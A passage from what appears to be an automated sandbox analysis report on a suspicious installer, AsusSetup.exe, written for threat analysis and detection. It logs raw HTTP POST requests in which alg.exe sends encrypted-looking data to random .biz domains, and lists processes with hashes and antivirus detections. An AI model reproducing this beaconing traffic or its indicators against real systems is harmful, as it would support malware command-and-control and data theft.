                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.025896072 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=78b2b0df7212dc80942251df94886f32|155.94.241.188|1730129941|1730129941|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        91192.168.2.450093172.234.222.138806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050962925 CET351OUTPOST /mswwap HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050992966 CET778OUTData Raw: f5 03 39 2a 8e ee 97 f2 fe 02 00 00 ed d0 0a 27 77 56 05 74 1b f6 5d d8 da 1d 9f 3d 4a 80 2d 62 26 3f 13 82 a9 10 7e 32 ae d7 83 5f 98 2c b2 e8 61 d6 7d 9e e6 07 f1 85 cb f4 65 84 13 ba 94 19 2e c4 76 15 12 1a fb f7 1b 8b 69 13 1f d3 dc e4 a2 0b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9*'wVt]=J-b&?~2_,a}e.vi!RZ`h[fu\pPW^56&787Vi`YoPM-:&x`Tv97!E8'i@'g_OCv31:d&964NQbm


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        92192.168.2.450094172.234.222.138806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.740770102 CET350OUTPOST /raodt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.740839958 CET778OUTData Raw: 04 c5 c4 31 1e 68 46 ae fe 02 00 00 ae 12 73 57 68 79 ea 92 88 85 79 71 21 9d 4e 02 ca e5 31 cc e3 a4 43 3c 27 ca d2 79 47 6d 59 b8 82 fa 49 bd 09 9f 55 a0 e1 49 b1 f5 2f 42 45 29 70 80 0d 2d 45 4b 42 35 0d 0f 3a 67 6f ae d5 0c a7 0a dc 84 6d a9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1hFsWhyyq!N1C<'yGmYIUI/BE)p-EKB5:gom^aw8fWe.:vhaS[$rTUYY<%ghRJRw(%=90-)sW\F^{z?!nr`zyayyt#vsHB


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        93192.168.2.45009554.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454838037 CET344OUTPOST /x HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454881907 CET778OUTData Raw: 30 ad f7 44 91 ff e2 28 fe 02 00 00 3a 5a f6 8c 04 5d 1f d9 d6 a2 ec 7c a9 6c a7 84 1e 7b 11 72 93 bb 32 09 24 89 95 8d 84 79 71 1d fe 1c 95 99 03 85 a2 60 d1 5c 9d 2f 89 2e cf b0 49 0e 4e 62 0c 4a aa da 07 fc 68 4d c7 9a e9 15 e5 a9 e8 0a 5b 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0D(:Z]|l{r2$yq`\/.INbJhM[:b77NwQBxI|Wj~k*?4lOJNqZ<_0K^7FsDk(=O0wGqR\)]r)HL:'~tr=V!
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.321760893 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=31dfac81c5b4cb6934b3f42684a1b34c|155.94.241.188|1730129944|1730129944|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        94192.168.2.45009644.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.372863054 CET348OUTPOST /yfvdkcw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.372885942 CET778OUTData Raw: 0a 5d c0 b5 ee ab 2b b3 fe 02 00 00 71 c4 ce ff 58 ac b2 87 87 d1 60 ce 4d e9 87 60 46 ce a7 05 29 74 26 8e 77 a9 9f b4 67 68 c9 c9 6d f6 58 6a 08 29 b1 63 b4 0d 16 4c 96 bd 54 88 5f 66 f6 c3 aa 2a 90 21 87 23 b9 19 5d 98 fe 71 60 7b 9a bb f2 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]+qX`M`F)t&wghmXj)cLT_f*!#]q`{)qNO*z`{u6_2WoL}C\^g0dL!Sm+Yj6I~;w41ugw`"+>fB?hW's)S|
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.034065962 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0a4295f622b74069eb0049bd3b2ba13c|155.94.241.188|1730129944|1730129944|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        95192.168.2.45009734.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060811996 CET358OUTPOST /yjhdmcatglnakd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060961962 CET778OUTData Raw: 4d e6 cd b1 28 90 62 7b fe 02 00 00 5e 30 09 01 3f b3 b7 60 10 8d 6d af 68 4f eb 2b 9a ea 76 3f 82 fa 3e 16 9d 1b fb 2b 0f c4 e0 5c bc 44 a7 8e 97 d9 62 27 1a e4 14 c6 7d 14 45 6e 6b 41 86 4e 3a 63 ad 48 50 44 fa 57 cc fc d8 33 00 fe de 2c 9a e0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: M(b{^0?`mhO+v?>+\Db'}EnkAN:cHPDW3,N=G$ct1N6T3sS1%s"GjL'fOr980_`y~r]Gjrx[`h6I


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        96192.168.2.45009834.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.338185072 CET359OUTPOST /ujivskprejscmpv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.338402987 CET778OUTData Raw: 2e 5b e3 cf 73 7e e9 b1 fe 02 00 00 2e 64 a1 91 a5 3a 16 99 d0 f6 6f 8f 22 a9 d4 3a 28 8a 9e 7e c6 f1 e4 d1 f0 aa e9 6f 95 fd 0a fc 29 bb b1 09 42 76 40 13 23 66 a6 d6 44 8c d0 0e 16 77 d4 3a c6 aa 96 37 6d f9 63 93 21 66 62 7c f8 bd 6d ed 6d 9e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .[s~.d:o":(~o)Bv@#fDw:7mc!fb|mmyjA(ky~r!=n28"du{ZRe+#1<S{~+t'e|rB+QlG&[*$tZ"$^2>A-^~?k
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.177078962 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4c6d5b085cb7eeaa4c07d4c802561397|155.94.241.188|1730129946|1730129946|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        97192.168.2.45009934.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218760014 CET344OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218786001 CET778OUTData Raw: a0 7e a6 56 7d 53 24 25 fe 02 00 00 69 93 bf 04 ca c1 d1 b1 6e 0b 5b 38 bc c3 85 d2 44 53 ef f4 65 67 66 7a 57 af de 3e d7 a5 b8 31 b6 97 da 5e e0 87 91 66 7b d7 da 75 62 e1 3e b4 ae 07 82 df 06 8f d8 1f fa 89 ae cb 0a 11 8c ee a8 fa 93 6e 87 f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~V}S$%in[8DSegfzW>1^f{ub>nh&\Z(*2T!N?b%q1 .BJ=*qh[E~z'hzunV`V,?Pz49s0&-KT9A_Nm.ge^FW4fiab
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.048444986 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69c9c57ba4b1a34d30b0da23afaec5d7|155.94.241.188|1730129946|1730129946|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        98192.168.2.45010034.246.200.160806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069463968 CET357OUTPOST /yamkuqcyqisosmtq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069488049 CET778OUTData Raw: e0 d6 ae e8 28 12 01 1e fe 02 00 00 e2 43 bc 7b fa 1a ed f4 e9 f0 a8 ac 31 63 ce 50 ca 33 8f ce 72 43 da ed 1e 66 aa 30 ba 9c 12 44 7b 72 e1 da d7 a6 17 aa 05 41 8b 9f b9 34 59 47 5f 08 95 8e e6 2e 1a 89 50 a5 f4 2c f9 ee 83 c9 1c 43 1c f8 4e 4f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (C{1cP3rCf0D{rA4YG_.P,CNOHT+.)xJ%C}%~nNE=#$w\eedR-<;CfSg{&x'=2veYCM`cMM'xC7|1J<
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.046047926 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=efb14b80b7705eb38d2c0bd72d2332ef|155.94.241.188|1730129947|1730129947|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:02
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\AsusSetup.exe"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:13BF2819401D2F983FFF90C1960831B8
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:02
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'445'888 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B304B3F52DE20CFC59D49162F1E99EEA
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:03
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'381'376 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0E2255EDBB351BDA0949D09F88FA226E
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:04
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:04
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:04
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:04
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8DF9B4C3E64A3509DEE72C0E8333DDA6
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
